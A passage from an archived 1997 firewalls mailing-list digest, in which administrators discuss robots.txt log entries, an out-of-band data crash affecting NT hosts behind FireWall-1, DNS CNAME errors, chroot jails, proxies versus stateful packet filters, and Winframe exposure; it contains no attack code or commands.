knows anything about a weird log msg that we got on our nt webserver? it > was a get to robots.txt > > There is no file or image that is related to this file name on our web > page. Could not even find it on the server anywhere. Am I unduly > concerned? > > -- Missouri State Data Center <*> James Proffer: UNIX sysadm Missouri Government Information | mailto:james@mail.state.mo.us for the citizens of Missouri | http://www.state.mo.us/server.shtml and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299 From owner-firewalls-outgoing Fri Jun 6 11:01:11 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA08716 for firewalls-outgoing; Fri, 6 Jun 1997 09:55:18 -0700 (PDT) Received: from woody.wcnet.org (woody.wcnet.org [205.133.171.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA08658 for ; Fri, 6 Jun 1997 09:55:05 -0700 (PDT) Received: from localhost by woody.wcnet.org (5.x/SMI-SVR4) id AA10704; Fri, 6 Jun 1997 12:55:40 -0400 Date: Fri, 6 Jun 1997 12:55:40 -0400 (EDT) From: Jeremy Zawodny To: "k. frisco" Cc: firewalls@GreatCircle.COM Subject: Re: nt web server log In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 6 Jun 1997, k. frisco wrote: > Withh all the talk about hacking webservers, I was wondering if anyone > knows anything about a weird log msg that we got on our nt webserver? it > was a get to robots.txt It's nothing to worry about. See for more info abou tthe robots.txt file. Jeremy --- Jeremy D. Zawodny WCNet Technical Geek & Web Stuff CRACK DES NOW!!! From owner-firewalls-outgoing Fri Jun 6 11:15:21 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA06309 for firewalls-outgoing; Fri, 6 Jun 1997 09:42:54 -0700 (PDT) Received: from mail3.microsoft.com (mail3.microsoft.com [131.107.3.23]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA06252 for ; Fri, 6 Jun 1997 09:42:39 -0700 (PDT) Received: by mail3.microsoft.com with Internet Mail Service (5.0.1458.30) id ; Fri, 6 Jun 1997 09:49:12 -0700 Message-ID: From: Vinod Valloppillil To: "'k. frisco'" , firewalls@greatcircle.com Subject: RE: nt web server log Date: Fri, 6 Jun 1997 09:40:37 -0700 X-Priority: 3 X-Mailer: Internet Mail Service (5.0.1458.30) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk web crawlers (altavista, hotbot, etc.) have a convention to look for a robots.txt file on a website before crawling the site. robots.txt is supposed to document which URL trees (if any) the site admin does / doesn't want to get crawled. > -----Original Message----- > From: k. frisco [SMTP:kfrisco@shrike.depaul.edu] > Sent: Friday, June 06, 1997 8:35 AM > To: firewalls@greatcircle.com > Subject: nt web server log > > Withh all the talk about hacking webservers, I was wondering if anyone > knows anything about a weird log msg that we got on our nt webserver? > it > was a get to robots.txt > > There is no file or image that is related to this file name on our web > page. Could not even find it on the server anywhere. Am I unduly > concerned? From owner-firewalls-outgoing Fri Jun 6 11:20:07 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA06095 for firewalls-outgoing; Fri, 6 Jun 1997 09:42:06 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA06061 for ; Fri, 6 Jun 1997 09:41:57 -0700 (PDT) Received: from oberon.qa.mvision.com (oberon.qa.mvision.com [165.7.4.34]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id JAA05682 for ; Fri, 6 Jun 1997 09:48:15 -0700 (PDT) Received: (from eschult@localhost) by oberon.qa.mvision.com (8.8.4/8.8.3) id MAA15491; Fri, 6 Jun 1997 12:44:09 -0400 (EDT) From: Eric Schult Message-Id: <199706061644.MAA15491@oberon.qa.mvision.com> Subject: Re: nt web server log To: kfrisco@shrike.depaul.edu (k. frisco) Date: Fri, 6 Jun 1997 12:44:08 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "k. frisco" at Jun 6, 97 10:35:22 am Reply-To: Eric Schult X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk k. frisco Writes: > Withh all the talk about hacking webservers, I was wondering if anyone > knows anything about a weird log msg that we got on our nt webserver? it > was a get to robots.txt > There is no file or image that is related to this file name on our web > page. Could not even find it on the server anywhere. Am I unduly > concerned? No, don't be concerned. Many (well behaved) web indexers (and other "robots") will look for this file, which may contain instructions to NOT index a particular site. I don't know what you'd put in it, I only know that its use is not a threat. -- Eric Schult E-Mail: eric.schult@mvision.com Bridge Network Integration Services 40 Rector Street NYC 10006 1-212-306-0357 From owner-firewalls-outgoing Fri Jun 6 11:55:30 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA04198 for firewalls-outgoing; Fri, 6 Jun 1997 09:34:11 -0700 (PDT) Received: from merle.acns.nwu.edu (merle.acns.nwu.edu [129.105.16.57]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA04037 for ; Fri, 6 Jun 1997 09:33:39 -0700 (PDT) Received: from localhost by merle.acns.nwu.edu with SMTP (1.40.112.8/16.2) id AA111814891; Fri, 6 Jun 1997 11:34:51 -0500 Date: Fri, 6 Jun 1997 11:34:51 -0500 (CDT) From: Brian Hatch X-Sender: bri@merle.acns.nwu.edu To: "k. frisco" Cc: firewalls@GreatCircle.COM Subject: Re: nt web server log In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- (Hi Karen -- long time no see!) + With all the talk about hacking webservers, I was wondering if anyone + knows anything about a weird log msg that we got on our nt webserver? it + was a get to robots.txt + + There is no file or image that is related to this file name on our web + page. Could not even find it on the server anywhere. Am I unduly + concerned? Not in the least. Many web spiders, search engines, etc will look for a file http://machine/robots.txt on any web server it is going to index. Some engines will not index any content on a server which has this file, whereas others will use it to determine what to index and what to ignore. So, it sounds like someone (potentially you) told such an engine to index your site, and it was just being polite before doing so. Bri __ Brian Hatch, bri@ifokr.org "Strange that if you cut off part of a Systems and Security Engineer chromosome, you get a boy, and if you Onsight, Inc. http://www.avue.com/ cut off part of a boy you get a girl." -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBM5g8H6wnNhOoR921AQGbEwP+O12vaOJDLldwFv758zf3gL8JBVUBS9WV 0ba4JTSYL7c7EqZl54HJHn3gh6rio+ntlF0RagE+BMTOB6FwEoOZq8+uUK/vAV28 0Se4ofR9u+wZxxyhi8cD73poOezR0t4+lnn2mmVcc0SZU/I6vWa9CLCbUw8N6yNa vqboII9IoDA= =/Odg -----END PGP SIGNATURE----- From owner-firewalls-outgoing Fri Jun 6 11:57:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA08601 for firewalls-outgoing; Fri, 6 Jun 1997 09:54:43 -0700 (PDT) Received: from peets.us.checkpoint.com (us.checkpoint.com [206.86.35.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA08579 for ; Fri, 6 Jun 1997 09:54:33 -0700 (PDT) Received: from brian.us.checkpoint.com (brainiac.us.checkpoint.com [206.86.35.59]) by peets.us.checkpoint.com (8.8.3/8.8.3) with ESMTP id JAA11405; Fri, 6 Jun 1997 09:56:29 -0700 (PDT) Message-ID: <33983FF5.5545B065@us.checkpoint.com> Date: Fri, 06 Jun 1997 09:51:01 -0700 From: Brian Connolly Reply-To: brian@us.checkpoint.com Organization: Check Point Software Technologies X-Mailer: Mozilla 4.0b4 [en] (Win95; I) MIME-Version: 1.0 To: Ryan Russell/SYBASE CC: Conrad Minor , Jyri Kaljundi , "Bryan D. Boyle" , firewalls Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts X-Priority: 3 (Normal) References: <199706060529.WAA15413@notesgw2.sybase.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'd like to take this opportunity to clarify some points and some misconceptions about what is going on here: (1) FireWall-1 does indeed intercept all network traffic as it leaves the NIC driver, and *before* it gets to the TCP/IP stack, thus hardening the stack against various attacks. FW-1 only passes traffic to the native TCP/IP stack after it passes the stateful inspection engine and the security policy installed on it. (2) FireWall-1 *does* drop all IP packets with IP options set, though it doesn't matter in this scenario since were talking about TCP options. As correctly stated by others, OOB is a useful feature in TCP that should not blocked for many applications. (3) Only one person claimed to have performed this OOB attack on a FireWall-1 machine successfully: Daniel Strawson . In a private email correspondence with me, he corrected himself, saying that the only way it happened was because he was letting *all* traffic through, unchecked. First, I would recommend to all FireWall-1 customers to not allow NetBIOS traffic into the firewall unless it was absolutely necessary. By letting the firewall block NetBIOS (as it would by default), the problem would have been avoided. Secondly, (if you *really* want to use NETBIOS) I would avoid letting these NETBIOS protocols through the firewall until it has been clarified that the latest service patch *does* fix the problem with the NT TCP/IP stack - for the meantime, let FireWall-1 drop the packets before it gets there. We'll be performing some tests here today in our lab on this, and I'll update the list as to our findings. Below is Daniels' mail: - Brian --- Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts Date: Fri, 6 Jun 1997 08:58:00 +0100 (BST) From: Daniel Strawson To: Brian Connolly Brian - As I've already said to the list (the server is a bit slow so you may not have had it yet), I was mistaken. We had the rule as 'Any Any Any Accept', so (obviously) as the attack does not set an IP header option, but a TCP header option, FW-1 will allow the packets through. Cheers, Daniel On Thu, 5 Jun 1997, Brian Connolly wrote: > Daniel: > > I'm interested in repeating your crashing of a FireWall-1 system. Please > tell me how you had it configured: > > * was the firewall set up to reject this specific traffic, or allow it? > * what port did you send it to? > * what program did you use to send the OOB data? > * what version of FW-1 were you using? > > Thanks, > > Brian Ryan Russell/SYBASE wrote: > > If I may interject in this conversation for a moment... > > Firewall-1 (and, understand I'm used to FW1 on solaris) > gets first crack at the packets, decides if they meet whatever > criteria, and then passes them on to the IP stack that comes > with the OS. It doesn't replace the stack per se, it still relies on > the native OS IP driver to route packets and such, but hooks the OS > such that the FW1 kernel gets to look at the packet first. > > On my firewall-1 machine, I've got the rules set so that no one > is allowed to connect to the firewall machine, i.e. drop all packets > with a destination address of the firewall itself. > > Now, it looks like the NT box in question did not have such a rule, > so port 139 was "exposed." There may have been a reason for > this, or it may have been oversight, or it may be a limitation of the > FW1 > implementation on NT, I don't know. > > I do, however, think it's an extraordinarily bad idea. > > Ryan > > ---------- Previous Message ---------- > To: jk, bdboyle > cc: firewalls > From: minorc @ reston.ans.net ("Conrad Minor") @ smtp > Date: 06/05/97 01:39:32 PM > Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts > > All, > > This of course doesn't address the problem with the FW1. It is just to > refute the notion that NT is a completely closed OS. > > Any firewall worth it's salt won't be running the native NT stack > unmodified. How for example would you plumb something like stateful > inspection onto an NT box without kernel changes? There are several > methods > of modifying the stack to harden it against attack or change the way > it > operates. The first would be to shim the stack ie putting a driver > between > the Ethernet card drivers and the stack itself. NT has built in > support for > this. Just read the DDK documentation. NT 4.0 has even better support > then > 3.51 since Msoft has added calls that let you dynamically hook into > the > NDIS stuff. This is in fact that's how RAS is implemented (NDISWAN). > > Another option of course is to replace the TCP stack all together. > Centri > from Global Internet does that. Check out their web page. They > completely > bypass the microsoft stack by building their own proprietory stack > which > intercepts all packets coming to the firewall. They optionally will > pass > packets to the Msoft stack depending on how your rules are configured. > > Packet filter firewalls don't even need a TCP stack. Just hooks into > the > NDIS routines that handle the reception and distribution of packets. > Probably could do this with another SHIM. > > All of this is documented by Microsoft, The source code for sample > drivers > are available as part of the DDK. While there are no sample SHIM > drivers, a > buddy and I created one for NT3.51 in about a month. It was really a > matter > of combining an existing ethernet driver with an existing protocol > driver > and making them talk to each other. > > NT even has source level debugging at the kernel layer. Name some UNIX > boxes that support that (not to suggest that one is better then the > other, > just that NT kernel work is easier. Streams are pretty damn elegant). > > Conrad > ---------- > > From: Bryan D. Boyle > > To: Jyri Kaljundi > > Cc: firewalls@greatcircle.com > > Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts > > Date: Thursday, June 05, 1997 9:46 AM > > > > At 03:08 PM 6/5/97 +0300, you wrote: > > > > >You mean you can crash and NT FW-1 by sending OOB data to it?! > > >That's scary if it is true and should be addressed by Check Point > ASAP! > > > > > > > It is a bogosity with NT and not with FW1. Can't be addressed by > Checkpoint, > > since the OS is not in their control. They can only operate (or be > as > > secure as) at the least common denominator level of the underlying > OS. > > > > >What I have always thought of FW-1 is that it operates at quite low > level > > >inside the OS kernel, that as long as you filter everything the > network > > >bugs in the OS don't really matter, as the packets never reach > FW-1. > > > > Nothing except MS code operates in the NT kernel. This problem is > with > > what happens when you send oob data to a stack (MS) that is tightly > integrated > > with the OS (FW1 runs on top of this stuff, not in it...) and the > stack/OS > > interface and control mechanism itself is crap. > > > > Of course, on UN*X systems, this is not the case. This is a signal > example > > of the difference between designing for peer review of your security > model > > and designing for what gets good trade publication reviews. > > > > > > > >If sending some bytes of data to FW1 crashes it and the OS, this > > >combination (FW1+NT) should not be used as a firewall solution at > all. > May > > >be someone from CP could explain, how much do the bugs in the OS > matter > > >once FW1 is installed. > > > > If there is an overall architectural problem with NT as it is, then > the > OS > > bugs matter A LOT. But, of course, those that say you can trust a > black > box > > solution since the vendors are trustworthy are quite quiet on this > regard... > > > > I would agree that you should ignore NT as an OS platform in a > > security solution right now. Just my opinion, $.02 US, etc. > > > > Flames to /dev/null. > > -- > > Bryan D. Boyle | LOGICAL: bdboyle@att.com 201-386-8584 > > #include | VIRTUAL: > http://www.access.digex.net/~bdboyle > > AT&T Laboratories, Inc. | PHYSICAL: Whippany, NJ > > | HISTORICAL: HQ, 6th Battalion, Army of No. > VA. > > "What country can preserve its liberties, if its rulers are not > warned > > from time to time, that its people preserve the spirit of > resistance?" > > -Thomas Jefferson, > 1787 -- =================================================================== Brian Connolly brian@us.checkpoint.com Business Development Engineer 415.562.0400, ext 252 Check Point Software Technologies fax 415.562.0410 From owner-firewalls-outgoing Fri Jun 6 12:47:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA10201 for firewalls-outgoing; Fri, 6 Jun 1997 10:03:59 -0700 (PDT) Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id KAA10143 for ; Fri, 6 Jun 1997 10:03:45 -0700 (PDT) Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA07606; Fri, 6 Jun 1997 13:07:35 -0400 Received: from vaxc.PIOS.COM (vaxc.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJR4TOR8Z48WYZEC@gemini.pios.com> for firewalls@GreatCircle.COM; Fri, 06 Jun 1997 13:09:36 -0400 (EDT) Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJR4R741CW8Y6EPI@PIOS.PIOS.COM>; Fri, 06 Jun 1997 13:07:36 -0400 (EDT) Date: Fri, 06 Jun 1997 10:11:35 -0700 From: Bill Stout Subject: RE: PIX and Firewall-1 X-Sender: stoutb@vaxf.pios.com To: Eric Vyncke , Bill Stout Cc: firewalls@GreatCircle.COM Message-Id: <2.2.32.19970606171135.00970908@vaxf.pios.com> Mime-Version: 1.0 X-Mailer: Windows Eudora Pro Version 2.2 (32) Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:54 AM 6/6/97 +0000, Eric Vyncke wrote: >Cannot resist to reply :-) Beware that I'm working for Cisco Systems ;-) >I'm stopping now because it is coming too commercial on >a technical list. Kudos to you! Greatness has been displayed here by Cisco. >But, once again: the PIX is a secure and performent component >of most security architecture. Bill Stout From owner-firewalls-outgoing Fri Jun 6 13:02:19 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA02966 for firewalls-outgoing; Fri, 6 Jun 1997 12:07:14 -0700 (PDT) Received: from grubor (grubor.csksoftware.com [207.51.56.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA02912 for ; Fri, 6 Jun 1997 12:07:01 -0700 (PDT) Received: by grubor (SMI-8.6/SMI-SVR4) id PAA23627; Fri, 6 Jun 1997 15:10:53 -0400 Received: from sophie.nysales.micrognosis.com(199.94.142.128) by grubor.csksoftware.com via smap (V2.0beta) id xma023625; Fri, 6 Jun 97 15:10:42 -0400 Received: from maggie.nysales.micrognosis.com by nysales.micrognosis.com (SMI-8.6/SMI-SVR4) id PAA11674; Fri, 6 Jun 1997 15:10:41 -0400 Received: from localhost by maggie.nysales.micrognosis.com (SMI-8.6/SMI-SVR4) id PAA05577; Fri, 6 Jun 1997 15:10:40 -0400 Date: Fri, 6 Jun 1997 15:10:39 -0400 (EDT) From: Neil Readwin X-Sender: nreadwin@maggie To: Ian Miller cc: firewalls@greatcircle.com Subject: Re: Unknown log entry... In-Reply-To: <199706060838.JAA03645@h01.scientia.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 6 Jun 1997, Ian Miller wrote: > I have no idea why this DNS is set-up this. According to page 191 of "DNS & Bind" it is an easy way to delegate in-addr when you are subnetting. The alternative is to list NS records for each address - if the subnets are 208.196.3.{0,64} then they would list 128 NS records pointing to 2 servers each serving 64 zones each containing 1 in-addr.arpa record. That would be ugly. At least the forward and backward pointers for chessclub.com match up :-) > >Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for > >"66.3.196.208.in-addr.arpa IN PTR", got type "CNAME" My reading of the book implies that this is a DNS server bug. However, I am certainly no expert in this area. Neil. From owner-firewalls-outgoing Fri Jun 6 13:13:47 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA03546 for firewalls-outgoing; Fri, 6 Jun 1997 12:10:59 -0700 (PDT) Received: from relay.mnsinc.com (relay1.mnsinc.com [206.55.3.25]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA03435 for ; Fri, 6 Jun 1997 12:10:33 -0700 (PDT) Received: from snowball.webtrek.com (klemmerj@snowball.webtrek.com [206.239.36.10]) by relay.mnsinc.com (8.8.5/8.7.3) with SMTP id PAA18979 for ; Fri, 6 Jun 1997 15:14:41 -0400 (EDT) Date: Fri, 6 Jun 1997 15:15:02 -0400 (EDT) From: Joe Klemmer Reply-To: klemmerj@webtrek.com cc: firewalls@GreatCircle.COM Subject: Re: nt web server log In-Reply-To: <199706061644.MAA15491@oberon.qa.mvision.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 6 Jun 1997, Eric Schult wrote: > > There is no file or image that is related to this file name on our web > > page. Could not even find it on the server anywhere. Am I unduly > > concerned? > > No, don't be concerned. Many (well behaved) web indexers (and other "robots") > will look for this file, which may contain instructions to NOT index > a particular site. > > I don't know what you'd put in it, I only know that its use is not > a threat. It may not be a direct threat but it can be an indirect one. There was a very good article last year about how not using robots.txt in some cases can bring your system to a crawling halt. I believe the article was in Web Techniques and it told how one web site was completely swamped by requests from the crawlers that it forces the CPU usage up to near 100% and thus made the site inaccessible. It was not an attack or anything but it had the same effect as a Denial of Service attack. --- "It's a damn poor mind that can only think of one way to spell a word." -- Andrew Jackson From owner-firewalls-outgoing Fri Jun 6 13:16:07 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA12767 for firewalls-outgoing; Fri, 6 Jun 1997 13:11:08 -0700 (PDT) Received: from squirrel.jerboa.com (squirrel.jerboa.com [206.64.153.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA12710 for ; Fri, 6 Jun 1997 13:10:53 -0700 (PDT) Received: (from uucp@localhost) by squirrel.jerboa.com (8.8.5/8.7.3) id QAA17915; Fri, 6 Jun 1997 16:22:29 -0400 (EDT) Received: from moose.jerboa.com(206.64.153.50) by squirrel.jerboa.com via smap (V1.3 deluxe) id sma017911; Fri Jun 6 16:22:13 1997 Message-Id: <3.0.1.32.19970606161237.027a2968@squirrel> X-Sender: ian@squirrel X-Mailer: Windows Eudora Pro Version 3.0.1 (32) Date: Fri, 06 Jun 1997 16:12:37 -0400 To: "Paquette, Trevor" , "'Walczak, Joe'" , From: Ian Poynter Subject: RE: ISP Connection In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:01 AM 6/5/97 -0600, Paquette, Trevor wrote: >There are companies (mine included) that do manage firewalls for >other companies, and we do a pretty damn good job at it. Our clients >TRUST us to do it for them. WE are the ones on the hook for any >break-ins and possible damage resulting from any outside >security incidents. I agree that whether to outsource firewall management (or anything else for that matter) is not a black and white issues. Trust, most of it subjectively evaluated, has a lot to do with how these decisions get made. However what I'm curious about is whether mcc.net is really completely "on the hook" in this situation. BBN's SitePatrol, for example, comes with an extensive indemnification clause in its agreements ("if you're broken into, we're not liable"). Are you saying that mcc.net doesn't have one of these clauses in their agreements? Of course, one always has the recourse to discontinue doing business with an outsourcer at any time, including after a break-in. Curiously, Ian ----- Ian Poynter ian@jerboa.com Jerboa, Inc. +1-617-492-8084 PO Box 382648, Cambridge, MA 02238 http://www.jerboa.com Providing unbiased Internet consulting for businesses. PGP Fingerprint: BA 0C 82 C5 F2 03 3D 95 7C CE FD D3 57 4E 15 73 From owner-firewalls-outgoing Fri Jun 6 13:30:33 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA14018 for firewalls-outgoing; Fri, 6 Jun 1997 10:30:35 -0700 (PDT) Received: from axil.intranet.ca (axil.intranet.ca [206.51.251.51]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA13999 for ; Fri, 6 Jun 1997 10:30:27 -0700 (PDT) Received: from cardinal (cardinal.almerco.ca [206.186.171.40]) by axil.intranet.ca (8.8.5/8.6.9) with SMTP id NAA11131 for ; Fri, 6 Jun 1997 13:23:35 -0400 (EDT) Received: from paon.almerco.ca by cardinal (5.x/SMI-SVR4) id AA23445; Fri, 6 Jun 1997 13:36:58 -0400 Date: Fri, 6 Jun 1997 13:36:58 -0400 Message-Id: <9706061736.AA23445@cardinal> X-Sender: mario@mail.almerco.ca X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: Mario Biron Subject: TELNET AND FTP JAIL Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I have a Linux RedHat 4.2 and want to setup a kind of "jail" system for the telnet and ftp login for some users. I want these users to be able to telnet or ftp to their account but I don't want them to be able to see anything else on the system. I think I have figured out the minimal files to have a skeleton access but I don't know how to apply it to certain users (a chroot I think, but how and where). If you know of a practical solution, please let me know. Thanks! ****************************************************************************** Mario Biron, Administrateur de Systemes Almerco Inc. -- http://www.almerco.ca 1695 Atmec unit 8, Gatineau (819) 669-3170 From owner-firewalls-outgoing Fri Jun 6 14:15:06 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA24155 for firewalls-outgoing; Fri, 6 Jun 1997 11:27:17 -0700 (PDT) Received: from goat.heurikon.com (goat.heurikon.com [204.95.85.80]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA24043 for ; Fri, 6 Jun 1997 11:26:40 -0700 (PDT) Received: from badger.heurikon.com (badger.heurikon.com [192.48.244.250]) by goat.heurikon.com (8.8.5/8.7.3) with ESMTP id NAA03294; Fri, 6 Jun 1997 13:30:50 -0500 (CDT) Received: from badger.heurikon.com (localhost.heurikon.com [127.0.0.1]) by badger.heurikon.com (8.7.6/8.7.3) with ESMTP id NAA23824; Fri, 6 Jun 1997 13:30:44 -0500 (CDT) Message-Id: <199706061830.NAA23824@badger.heurikon.com> X-Mailer: exmh version 1.6.9 8/22/96 To: ryan.russell@sybase.com cc: firewalls@greatcircle.com Subject: relative security of Proxies vs. SPFs Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Jun 1997 13:30:43 CDT From: John Stewart Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ryan.russell@sybase.com said (at http://futon.sfsu.edu/~rrussell/spfvprox.htm): > So why do I claim the SPF can be more secure than proxies? Again, I > emphasize can. Let me start with the converse: If you are only going > to allow a single protocol through, even if you don't want to filter > or validate the data in any meaningful way, get a good proxy. It > should provide better security than a SPF. > So here's my argument: Before, I gave an example of a bad proxy, it > had a bug (unexpected behavior, bad design, to simplify, I'm going to > call it a bug.) Ok, so SPFs can have bugs to, right? Sure. So, now > you have to "proxy" two protocols. You still don't want to do any > special filtering, just pass it through. So, let's assume that > proxies have one bug each, as do SPFs. So, we have one SPF and two > proxies. One bug with the SPF and two for the proxies. Do you see > where I'm heading with this? If you want to pass n protocols, you > have n bugs with proxies, 1 with the SPF. Or another way to think of > it, the proxies will be (collectivly) 1/n as secure as the SPF. I'm not by any means an expert on the subject (or on firewalls in general), but I must beg to differ with your reasoning... A Stateful Packet Filter (SPF), in order to deal with a specific protocol (telnet, http, ftp, etc...), has to have a specific ruleset to deal with that protocol, correct? Therefore, shouldn't we assume a bug in each of the protocol rulesets rather than in in the SPF as a whole? Then we'd have two bugs in the SPFs vs. two proxies with one bug each. Given this, and your previous arguments, they work out to be the same security-wise, although I also don't think that the overall security of the product is fairly evaluated by merely assuming 1 bug per section of code. If you're going to use this line of reasoning, you should at least factor in the relative probablity of a bug ocurring based on the complexity of the code (how does proxy code compare in complexity to SPF rules?) *AND* the probabilty that a random bug will compromise security (I'm inclined to believe that an SPF ruleset is much more likely to fail-open than an equivalent proxy). johnS From owner-firewalls-outgoing Fri Jun 6 14:17:35 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA24336 for firewalls-outgoing; Fri, 6 Jun 1997 11:28:38 -0700 (PDT) Received: from freenet.grfn.org (grfn.org [206.30.236.51]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA24322 for ; Fri, 6 Jun 1997 11:28:28 -0700 (PDT) Received: from unknown (dlup85.i2k.com [199.176.248.85]) by freenet.grfn.org (8.8.5/8.8.5) with SMTP id OAA11196; Fri, 6 Jun 1997 14:26:45 -0400 (EDT) Message-ID: In-Reply-To: <199706061350.JAA12541@homeport.org> References: Conversation <3.0.1.16.19970605220043.356f0950@mail-hub> with last message <199706061350.JAA12541@homeport.org> X-MSMail-Priority: Normal X-Priority: 3 To: "Adam Shostack" , "Ken Gunther" Cc: "Firewalls Mailing List" MIME-Version: 1.0 From: "Mariko Yashada" Subject: Re: Does Winframe need a firewall? Date: Fri, 06 Jun 97 14:33:21 PDT Content-Type: text/plain; charset="ISO-8859-1"; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have worked with IBM's Global Network, specifically the Advantis SecureNet.. Access to resources on the network (web servers, mainframe hosts, whatever) is controlled by RACF ACLs. The user connects to the network and logs in using an IBM client. If the ACL for the resource has an entry for you, you will be able to access it. If not you you won't know its there. I don't kow if this is done by controlling routing tables or what. So unless you have an IGN account and I have authorized your access to my resource you won't be able to see the resource, unless you can hack RACF or the routers. There is an option to encrypt data traveling within the Network. The connection between the Network and the client is also encrypted. I don't recall what level of encryption is used though. If one of our clients who has access to our server on IGN is capable of getting into it, there's not much we could do to stop them. We don't have a firewall in front of the server - http and ftp (GET only) are the only services enabled. Its not connected to any other network though. I ---------- > If I get an account on IGN, what prevents me from attacking your > Winframe box? Do you trust Citrix to have gotten all their security > right? What can I gain once I've broken it? (Hints; does it > strongly* encrypt passwords as they go over the net? Does it resist > password guessing attacks? Session hijacking?) > > *For explanations of strong encryption, see the Snake Oil Crypto FAQ. > > http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html > > Adam > > Ken Gunther wrote: > | We are currently using Winframe by Citrix to give remote users access to > | applications at our datacenter. Access to the Winframe box is through the > | IBM Global Network (IGN). IGN is a subscribers only network. It is not as > | open as the Internet but by no means do we have control over who is on it. > | > | We currently have a firewall in front of the Winframe box but there is a > | noticable delay in keystrokes when going through the firewall (TIS Toolkit > | on a Linux box). We have performed some tests where for short periods of > | time the Winframe box was connected directly to the IGN and the keystroke > | delays went away. > | > | Is Winframe safe to put directly on the untrusted network? We are > worried > | about unauthorized people getting through to the trusted side as well as > | denial of service attacks where people try to crash Winframe. > > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume > > > From owner-firewalls-outgoing Fri Jun 6 14:26:20 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA24477 for firewalls-outgoing; Fri, 6 Jun 1997 14:08:31 -0700 (PDT) Received: from 158.152.116.88 (threewiz.demon.co.uk [158.152.116.88]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA24457 for ; Fri, 6 Jun 1997 14:08:16 -0700 (PDT) Received: from monaco (unverified [192.168.1.2]) by monaco.kimble.co.uk (EMWAC SMTPRS 0.83) with SMTP id ; Thu, 05 Jun 1997 01:17:46 +0100 Message-ID: From: "David Harvey-George" To: "M Gillett" 